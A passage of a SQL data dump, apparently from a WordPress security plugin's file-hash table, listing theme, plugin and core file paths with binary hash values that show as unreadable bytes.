��','',0,'?'),('ͪu�owsFC�G[c��','wp-includes/rest-api/fields/class-wp-rest-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h�Co�;�,.!O^�>','Otu��%~�x�ʱ��o��ӗJ���4��%�','',0,'?'),('ͬGG\\0q.��͜��','wp-content/themes/hueman/assets/czr/css/img/green.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|(w40��\\P~\0�lX�','v\'�\"��U=n�W���Ngv�ne�-�S�.��K�.','',0,'?'),('ͯ\r�m�M����7�f�','wp-content/themes/promote/inc/kirki/includes/settings/class-kirki-settings-repeater-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�O�l��k��','����#9�K��K&QJ�A�s�ȁ�G�4z#�','',0,'?'),('Ͷ�jʃఱ���-�','wp-content/plugins/wordfence/lib/menu_firewall_blocking_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:د_x��O0�8���X','�[�|�r�;�������Ƹ����l�b��� Q','',0,'?'),('ͽ3��=��O�G�|~�','wp-includes/SimplePie/Credit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�6�K>.��L��','r�ٴ��@c�@���{R�CG����d^�>>E\Z','',0,'?'),('�ϘFvD�̫H�','wp-content/plugins/wp-cerber/assets/flags/tg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����f/f�|f~�8','=JUV�1H���kE����OZ�oD\\��','',0,'?'),('��3�����F�<��8','wp-includes/js/underscore.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����$b��Z�C','�8A�2�xz��\0<G-�E ��r��쇮?�R�','',0,'?'),('��S�>s�U)����H','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y$�NX���l��l','[�-���v5<��M\n���+B�u.,�5g','',0,'?'),('���j(g��~jU#��','wp-admin/includes/class-wp-filesystem-ssh2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|�\r�<�\n����-��1','�Am���(�t��w�*lEd�s��@������','',0,'?'),('�r�͝&���]V���','wp-content/themes/promote/inc/kirki/includes/dynamic-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ԟ��\r`�n$\Z��~�','�P���x��D\'�6��Ǵ\\�?�E���S7vw','',0,'?'),('� ��Mu�)`��>�2','wp-content/themes/twentytwentyone/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��~E�Ю��ȕ��9~','��q��?{Q%8��ѣ�=��\'N�4oÒ�s','',0,'?'),('�EiL�+�[��\\{��_','wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P2.php',0,'�YA��G=b�u���','�YA��G=b�u���','z�,ͥ���t <{@Y{�iy��s���c�(S�L','',0,'?'),('�LF��?��t�*Xjp�','wp-includes/wp-includes/js/customize-views.js',0,'\"r�<`����D��','\"r�<`����D��','b2�M��!o�;�-�veq��\\f�]l����:','',0,'?'),('�N: ������@�kς','wp-content/themes/twentytwentyone/template-parts/post/author-bio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�Ɓ.����o���O#','d�{�_�U��R7I���o�(�~�6,\rT���\n��','',0,'?'),('�Y��f/�pw����','wp-includes/Requests/Response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p����R櫷�\'G','����WwYKL\n�� -*���^e\"e�(_,g','',0,'?'),('�\\��?�p(5�=��8','wp-content/themes/promote/inc/admin/welcome-screen/sections/getting-started.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','sݘ~���F�Xr�\'�','��De��մ}��\ZG��9�����#��v%sQ��,','',0,'?'),('�^����%�,�C','wp-content/themes/sg-window/img/icons/small/twitter.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z_s�6P�a:|sJ','�0��Mޛ���(Q\\0Һ�s6LV��c��ʫ','',0,'?'),('�_)-�]�ˌkO ��','wp-includes/ID3/module.tag.apetag.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\)���H�G���>�','ٚ+��\"�Bt��� \'S_��̄E�s��_�)^�','',0,'?'),('�l/<��U��ZA��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�Sz�L�HAWr�6~','0��pU���gו�G/���%��\'���Zd�\n\n','',0,'?'),('�|��f�����,2�T ','wp-admin/term.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i�3&�Е��(6�&�','H�4\0�p�B��a��m�f���SU\n��T','',0,'?'),('�ޱ����D��','wp-includes/wp-includes/functions.wp-scripts.php',0,'�|�4ؒT�$�0B-�','�|�4ؒT�$�0B-�','x�89@��G��#���G�b}y\'�A����v','',0,'?'),('ΝP|�ڒ����\\�o','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �w^��]緣M','����ZE�O�7(�nY��h�˨��','',0,'?'),('άM��w�d��TH��6','wp-includes/wp-includes/customize/class-wp-customize-themes-section.php',0,'��T��vl��3��','��T��vl��3��','�,V���3R�w���.���\r+4ݦ`=�`R','',0,'?'),('α�Z ��i�Iȏ�','wp-includes/rest-api/endpoints/class-wp-rest-application-passwords-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���m3�E�?��՛','0pU��Ĭ���h���C�r+���˞I�{-qA�','',0,'?'),('���+4#�E����Wl�3','wp-content/plugins/wp-cerber/assets/flags/ma.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����E3ц�Җ`?n~','�Lx����9�yՌ�6luт�l�Ca�e@���','',0,'?'),('�œ���ϔ�=��#6','wp-admin/images/post-formats32.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WY~�O��{�+_L�kE;','k�<8�._D��K����G[�5e-I(0w��h','',0,'?'),('�Ѻ0x�� t\\����','wp-content/themes/skt-pathway/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g��R=:lpp����','���qRX�rbFM�[��NH`�ծoKf�7I','',0,'?'),('��+�J�w�E R��;','wp-content/themes/travel-stories/font/Lora-Regular/lora-regular.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{�ob%��F�xP��','�䨠��9��Z��E�`��wv�oWp��\"\n�','',0,'?'),('���Ҍ\"��c��Q�~','wp-content/themes/promote/inc/kirki/includes/field/class-kirki-filed-link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!.ξ�������','13� �=�>���zk/��&�ڍ|��\ZR�]�','',0,'?'),('��\Z��\0��a���+τ','wp-content/themes/advance/inc/kirki/assets/js/controls/repeater.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�oB,2�kM�@�|�','��l��b����v�����mU�?UE(YfD�� t','',0,'?'),('�\0�˚��i�\0e���M','wp-content/themes/sg-window/js/navigation.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C*n{��Y$�D`zҮٍ','9!O|�i���(��8s6�\nV\"�\nE�7��#m�','',0,'?'),('��,���@���Q�','wp-content/plugins/wordfence/views/common/indeterminate-progress.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I��\"�sg�4�\\(�8','�@��Zn\"ξ~�QՔ��8�s�P���\07�3','',0,'?'),('��$e�&�gq�i�m�','wp-content/themes/twentytwenty/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[���L�*��H��u���','~��д\"�\'6���xg�k�?$��u�J{R^','',0,'?'),('�-�+�e���m�u\"��x','wp-admin/css/colors/sunrise/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':ur�\\�٭l_��?�','��.�jflޛ���,&���ĸ�G��Ku�?���','',0,'?'),('�26�6�# S[h(\\��','wp-includes/css/dist/block-library/common.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QD�����B+|lH��','������\n(�c�CF���T�)I�� V+�','',0,'?'),('�PW�\Z<w�jS~��\0zu','wp-includes/wp-includes/Requests/Transport.php',0,'��;�k���K\\Vl�','��;�k���K\\Vl�','ɯO3e���F��㛆��v+����.r/�>�,','',0,'?'),('�Q�K���Q95�Ɣ`','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/City.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���>��Y!\\z��JX','��B*yL˰��a��u�\"t�\Z4��Z۳Nk¥','',0,'?'),('�XC�b�;�f\0;<�','wp-content/plugins/wordfence/modules/login-security/css/admin-global.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-���S�H1@�kQұ','��^H2m<��LA��m N��G�)Iw��:�D','',0,'?'),('�_q ^��<�8��:� ','wp-admin/css/colors/modern/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E��U�M�\rv4�GP','M$_��f#5�r�풗g��\0��ra���O�m�N','',0,'?'),('�o�\'��8�FXM�l','wp-includes/wp-includes/ID3/module.tag.id3v2.php',0,'o�d�4��y�N�4','o�d�4��y�N�4','aƙ�4>$�z���%�5��z ����9��_','',0,'?'),('�uF��^G��E+��c','wp-admin/network/freedoms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u���6�|��tJ4�1�','��B�;����M�7�߃��[�9�</�','',0,'?'),('π�tGȩ����D','wp-includes/js/tinymce/plugins/image/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B�\n�4�\\��0�=','Q�v���SI>;4��1�%�rf�$@�p��\\j','',0,'?'),('ρ�U��(�AP�@h��','wp-content/themes/gambit/template-parts/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�:q{���* \rcsD\0','��ikE�0p �e���iJ��Q]����?�����','',0,'?'),('ρ�h�����Ѱ�ux','wp-content/themes/wp-barrister/library/images/icon-av.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5N�\0T��3��','���$��8���K8?�Or� �j\"\0H�*_�;��j�','',0,'?'),('ωv��v|A���o;�','wp-content/themes/sg-window/img/icons/ask.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����p�X�q�J','2�xQ���^17h,e�+�+���Bwh�RT�q','',0,'?'),('ϊ=��X���bBz\' �','wp-includes/js/jquery/ui/effect-explode.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ƒ���l��Ե','\"�Q�\0_jՈ\'5(ʏ�2&-(��j;�|]','',0,'?'),('Ϛ�\"���j�y����^','wp-includes/js/dist/blob.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E\0\nwPҫ\n:O��','ox�uNh#�_�\" ���\0i�(~&xj;G�','',0,'?'),('Ϛ�{h����P�i\\`�','wp-content/themes/maxbusiness/js/simple-lightbox.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�^�\0�0Fi �]','�w��2��5�J.�܀ӗ��1G�T�4��/�W�','',0,'?'),('ϝ���M�f�,�x�','wp-content/themes/weblog/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a���M�Ln���V�uh',']�!R*����\r�,/`W�܂z��X����','',0,'?'),('Ϫɶ��T��ȿ&Cw�','wp-includes/wp-includes/customize/class-wp-widget-form-customize-control.php',0,'�{�D*@6�{τ}��','�{�D*@6�{τ}��','�+֓zi���@����^F%5�qZg<��','',0,'?'),('ϵ�G��.�l&�ͼ','wp-content/themes/promote/images/blank1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����PϢ}�)�#�','c�������>�?�QYY�NZr��\"��^G<��[','',0,'?'),('ϺLC������4S�N','wp-content/themes/hueman/assets/front/js/ie/selectivizr.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4;�6IO��7E��3','0~3F��SQ�K���};20Z�K)\r���x\'','',0,'?'),('�����HԹ��f�k�','wp-includes/js/tinymce/wp-tinymce.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1_H�0���US��@h�','������_ؕ���N͞����1�*��ǜ��','',0,'?'),('���SZ�j�4�6��','wp-content/themes/hueman/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�IG\n\r��y�ߑ�S�e','�C��������>W57�Ş�O`��f�\'+�','',0,'?'),('�ƹ��Ml����n\'','wp-content/themes/advance/js/unminified/jquery.easing.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���K&Ռ�s��hI�','.<��콋��h;s�6�ʸ�]Z�2��`$m�','',0,'?'),('��� �)��K���','wp-includes/wp-includes/blocks/rss.php',0,'z<!�U�n��_�eQB','z<!�U�n��_�eQB','Pn�2���&�Y!�>P�ٙ�{�q61����p','',0,'?'),('���yKv��.�\Z�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/namespaced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��_�3��Nw�#�','�ǥ��mZz*,=:\n��-�3��|��!���','',0,'?'),('�ݙ�P(���O\'E��e','wp-includes/js/jquery/ui/effect.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8�b�N���\nk!?','aQ���Qޖ�X�g�P�����;���:@�3�','',0,'?'),('�鋭��{^�MU*�_','wp-includes/js/twemoji.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ޮ��!�P��+!�x�','���Q���ӫ��q��6uN�','',0,'?'),('��`�@��{�\'d(��P','wp-content/themes/Kent/FT/plugin/options-framework/includes/class-options-framework.php',0,'n .��OTJ%~9M��O','n .��OTJ%~9M��O','�%挌C�[����;n~�/HǷ�p�!/�l�jo','',0,'?'),('�Z�E&\"j��H����','wp-content/themes/promote/inc/kirki/includes/controls/class-kirki-controls-sortable-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H�*�\0tY�M[���','�$M��H}f(<�\"@����=$��gIw�� Ԫ','',0,'?'),('��\\T��@SO�|m','wp-includes/blocks/audio/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8}(�iC-.�w','�Pp��6��R���{��PeP�Q\r�k7�_?�','',0,'?'),('�@��AO= �yA�','wp-includes/class-wp-paused-extensions-storage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�ʤ�O��.�LX','UY����ޖ\\\nj6h��́��bYn��5��','',0,'?'),('��]mٲ� ▭�','wp-content/plugins/wordfence/vendor/composer/installed.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>w�̩ ��&J����)','���M��,�P:�k�\nN�2�[s\nWze]oN','',0,'?'),('�\Z��YÅjxU�#�6�k','wp-content/plugins/wp-cerber/assets/flags/mx.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�W6;���%����','E���&8��0�`�����\ZQ3`���w]#�ע','',0,'?'),('�A\Z�y����#��','wp-content/themes/storeone/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-�ҕP�kL�A','JP&I�CB|�hZFȄd���ct�4��lT��A','',0,'?'),('�%#��t���4�x','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�W�0{X�n�Z�0','�\0AV�RX��ȕ�~��d�^�/)�@R��','',0,'?'),('�3|>[�\n`��xѹ�u','wp-includes/wp-includes/js/jquery/ui/selectmenu.min.js',0,'p��Wj*m��Es�','p��Wj*m��Es�','�l$1dT��z֬�H\r���*�xQ��,e4e','',0,'?'),('�>6bY���AUF�.','wp-includes/blocks/archives.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{��\nP?^��u:� ','TU��r�-{��O9�P�P[�s��\0�P�t�9P','',0,'?'),('�>�s�l�WD7�M�','wp-includes/bookmark-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�dZc7��4�JX��','�t��l�P?d���=)��@zi�!��9a�','',0,'?'),('�Tq%<>z�բ�','wp-content/plugins/wp-cerber/assets/flags/bv.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j.��#�0�P','2�!��u��6#=�%�ӹO���C4� \Z���rM�','',0,'?'),('�W]�@�ԛi����','wp-content/themes/anima/includes/loop.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�iG\nVoS)���','#��F�M�B� gL������\0���+IN�oOI�','',0,'?'),('�tI���^���=��','wp-includes/wp-includes/Requests/Exception/HTTP/511.php',0,'un�N<Kw�Л����@','un�N<Kw�Л����@','��I��}7+ƕ�A���l欿B��t�\'s��t','',0,'?'),('�wa� _�zJ;D�W��','wp-includes/wp-includes/js/wp-pointer.min.js',0,'\"�%��iهkm���','\"�%��iهkm���','U�Xu��LJ�)G,i��m����5�_��MT_','',0,'?'),('К��V�Yu���\n��','wp-content/themes/promote/inc/kirki/includes/styles/class-kirki-styles-output-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ndrU��~ ��R���','� ���C�\n�3a��t�#���I�Oͷm �','',0,'?'),('Т�펹�|����@','wp-includes/images/smilies/icon_arrow.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �J<�g��o�9:x','�n�c���x0�ĥ���t��N���Y2X\0!','',0,'?'),('Ы6d}�/AQ�M?�Z _','wp-content/themes/skt-pathway/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��i[M�AD���{�','�e9-��2��@�S��M����= #�|U��','',0,'?'),('Э�����l��� ��S�','wp-content/themes/advance/js/unminified/jquery.matchHeight.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k!a.;ԅ\r��[�:E�','bkE���>C���F�i�_#�-B���K͚eKC','',0,'?'),('иn?���\"�xG��','wp-content/themes/weblog/assets/library/Font-Awesome/css/font-awesome.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O��`G��7?O�V9ȿ','k�ս�e+�2@l�\Zu��rL��G0���s6A','',0,'?'),('й� H�n����0����','wp-content/themes/advance/inc/kirki/assets/js/vendor/selectize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ޝ[kk�>S��B','N��������_��mw�s�/I�Rú]�T�','',0,'?'),('н/W�|�ų�b=','wp-content/themes/kidzoo-lite/inc/kidzoo-breadcrumbs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����lHx�1�','���\r�)�hŬ~!�HMm� �����*','',0,'?'),('�ŷF�֒d�D\'�\Z���','wp-includes/wp-includes/images/xit.gif',0,'�� 3X�ī9+�6n~','�� 3X�ī9+�6n~','�� s������ۨ��S,md�\\Yb�Ƈ��o','',0,'?'),('��/��?����U��','wp-includes/Requests/Utility/FilteredIterator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X�!Vs�� �AS�','Lq4���Z��յ�H\0�e7f=��\r�\nDC>OV','',0,'?'),('��2[�v\\)�I���Q','wp-includes/rest-api/endpoints/class-wp-rest-block-renderer-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eo1Ǡ܇4RA����','�{b3P4ؚ�R�/��5y�\\d�Q�bzE�x','',0,'?'),('��^�\\�X�PvS�\\�{','wp-admin/js/media-upload.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�V?��a�n\r��','�E������a,�\Z��,yM�/\\iQ�Ӡ\"�?28','',0,'?'),('�ؐ�+!�5�o&���','wp-includes/wp-includes/js/wplink.min.js',0,'��`��̶�Vu��m��','��`��̶�Vu��m��','Ե*&n�����_��f\nz\r*���3I�I;C�','',0,'?'),('��צp�B+�`�����.','wp-content/themes/advance/images/lay_hover.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.{Il��#[er�_\"','LA�7�ޭ�)�\r��i��\\��~$H�яx','',0,'?'),('��/<v`6��Y]��\r','wp-content/themes/twentytwentyone/assets/sass/07-utilities/measure.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(���������{ƸM�','�\r���E=���K��I�y!Y��v*�\\��_�>','',0,'?'),('��45�n���U�S�w','wp-includes/wp-includes/script-loader.php',0,',:q���Hn<4���@',',:q���Hn<4���@','���جK��\'��\r<S��K�\"����6i+��9','',0,'?'),('��\":v���zL�d�','wp-content/themes/advance/inc/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D����� �%�P','�UT䑟��\n��\r����3 �U����ްH,�','',0,'?'),('�����,���f��','wp-includes/rest-api/fields/class-wp-rest-comment-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ZƾB�,J)T�cx','\0IM���|%�c��t�\0�Φ���q��s��5','',0,'?'),('�=N6�B��]a�Υ�','wp-content/themes/advance/js/unminified/headhesive.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s��\0�;#Q��o�g','�ZV�>�H��\'8�NE�[�d�P�i訫���X','',0,'?'),('�K�?ػ����x��','wp-content/themes/sg-window/js/theme-customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�G`�?ɼ���','6Ze���:���e�\Z�qG�7M\n��8s','',0,'?'),('�UW�~/N�� � �','wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-svg-icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\nԤ���榡..�X ','���`5�ş�wo���(^�5��U_�gJ�','',0,'?'),('�Vl�:e���7����','wp-content/themes/promote/inc/kirki/assets/js/controls/typography.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�[����Cdߌ�;��','�����z��4Y����L\Ze�^�@�(��','',0,'?'),('�_\\c9mL�v��1��','wp-includes/compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ��}�as� ����?�w','��K���yc��TsKfsb{���- k�X��','',0,'?'),('�kwz���\\�A���I�','wp-content/themes/hueman/assets/admin/img/col-2cl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�_��p��Ͽz�E�f','G뱇:-Y�h쳲U�J�Ǭ-��k�M�f�','',0,'?'),('�ma�vMv�K�\Z','wp-content/plugins/wordfence/views/scanner/issue-wpscan_fullPathDiscl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t��G��N��8� ��6','�Y���V)�ceW/�Z��mҳn\'n�\0�MK~','',0,'?'),('�uRl�t����\"��','wp-includes/sodium_compat/src/Core/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7֊i[L�9ƁH �','߹{8(��Ïat��\0C�n3Q�ڤ\n�l?�$y�','',0,'?'),('ф���X��r\nf��tk','wp-includes/wp-includes/js/tinymce/plugins/compat3x/plugin.js',0,'+�n���1����oVb','+�n���1����oVb','C���T�(��N+�,��TN�C����`ީ���','',0,'?'),('і��\"��s�k���83','wp-content/themes/twentytwentyone/assets/sass/05-blocks/social-icons/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�Ә������)��n','�(%�L{�0�d� &��X�2I���\Z�ʜgq��','',0,'?'),('јB�ɵ� ��B4_[L>','wp-content/themes/event/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/e�D�۞�\Z�1v','��7p� ����L6\'dų#������b�O?�','',0,'?'),('љ5�X0�hTg���b�','wp-content/themes/newsmag/inc/customizer/settings/banners/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}�*�x���NrҮ','gQl��\n����0��?��Ģ4+:Z��պy�8��','',0,'?'),('ѡ&�M]CF�����','wp-content/themes/hueman/assets/front/img/demo/7-160x160.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,�!�T��l�T�','��otc�{�B,m�t�?u�+AF���af��\n','',0,'?'),('ѱ_�Gup��','wp-includes/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php',0,'[cl�r�u� �Сu^','[cl�r�u� �Сu^','6p��\'`�+*[AG�4�����^6Ŋ��%�C','',0,'?'),('����{?�]��)-�`�','wp-includes/wp-includes/SimplePie/Cache/Memcached.php',0,'����\n�\'Xlab��4`','����\n�\'Xlab��4`','?O�d6�C���u���>Jr��h�t����e���','',0,'?'),('���+�Z@��b$宦�','wp-content/themes/pine/admin/img/right.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��13��n�g[�{�,','�����R0~����[�!����VSx`i�','',0,'?'),('��}\0D��\nx_�)ؙ�','wp-includes/wp-includes/post.php',0,'{��Ԑ��[\"`}B','{��Ԑ��[\"`}B','�)���v��\"�G��\"�YV<�Q�X :��','',0,'?'),('���_�V#��Bt','wp-content/wflogs/config-transient.php',0,'\'ų\rV��n+mUMՠ�','\'ų\rV��n+mUMՠ�','�&O�%��oɦ��i7Z���Z�-76�9','',0,'?'),('�Jh|��0�`Zp�E','wp-admin/user-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2 B��b4��8�Tb','g. �YZ��:Y�(�m�<�bB6�<����hX\"�','',0,'?'),('�m��I�`��\n@�v','wp-includes/wp-includes/css/buttons.min.css',0,'a��n��G��f�g���','a��n��G��f�g���','k!L4>H�i�AF��f�BR�eR@����W�','',0,'?'),('�7�[*w�J\nn���>','wp-includes/js/dist/redux-routine.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�e�t{�-�L�a���','R̉G��L��/-\r@�)e\0�B1��H!{>','',0,'?'),('�Am|��7��f��','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-palette-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�I=���\n�-�r�9','��M������;2h�%�~�!_�myt��;b','',0,'?'),('�E^���B��s��~','wp-content/themes/hueman/assets/front/js/jquery-plugins/jqueryextLinks.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�mWI|����,]\\j�','�t|8wo����ۨ��xF�X�\Z�^p�\"$:�','',0,'?'),('�H0~x�m8U*�<�','wp-content/themes/maxbusiness/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��״m�X{�Db�e6�','yg���� t�<������ЙΟ\'�f�z','',0,'?'),('�Sz�*b=l�+9��j�i','wp-content/themes/promote/inc/kirki/assets/images/kirki-bottom.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����v�}��^��','�%\Z�\"S��/k��������������Q�','',0,'?'),('�ngj\\\r\ZT�_~��w','wp-content/themes/cactus/assets/plugins/bootstrap/css/bootstrap.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*1ܡ�i#�v�vLX�','���.bHԱ��=��\\��-�]3�����k{��','',0,'?'),('�x\nA[�*ZxS��9�NY','wp-content/themes/twentytwentyone/assets/sass/style-dark-mode.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���<�[2� �[\r�','bK���76V��P9$GA;&e�k�����','',0,'?'),('҇��|��z���H��Y','wp-content/themes/skt-pathway/images/bullets.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o�5�M�Z:��W<ݐ','I�H�7 R�����*ő�{���Ϭ��fC�BEC','',0,'?'),('Җ6���M֦��5wH�','wp-content/plugins/wordfence/views/options/option-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y�Zqf���@1cR�A','d%�ZAp�N��q�ϲ<|$����\Z����o���n','',0,'?'),('Ҟ���ǟ� Ks���','wp-includes/images/icon-pointer-flag-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���2�b��&�Z�r','4���Bȥ��\'x+c�h�ҠVn�5�I�>�j��','',0,'?'),('Ҫ*���H���\n;t��','wp-admin/includes/ajax-actions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����~ܯ4��v�\0','�W��Po�Ep�x�]�%i1~Y\'$��]��U','',0,'?'),('ҭ�_VlK�g�!p�1','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/rules.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oҡu�/B�&?�h��','�Dٽ.�j7It�l�KD�pC���O���Уh�\n','',0,'?'),('ҮUzj��DŽ��=�n��','wp-content/themes/advance/js/advance_other.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������Q�Y�u','�\"�Jf�]_Y7�(o����d�OX[�d��\0.fG 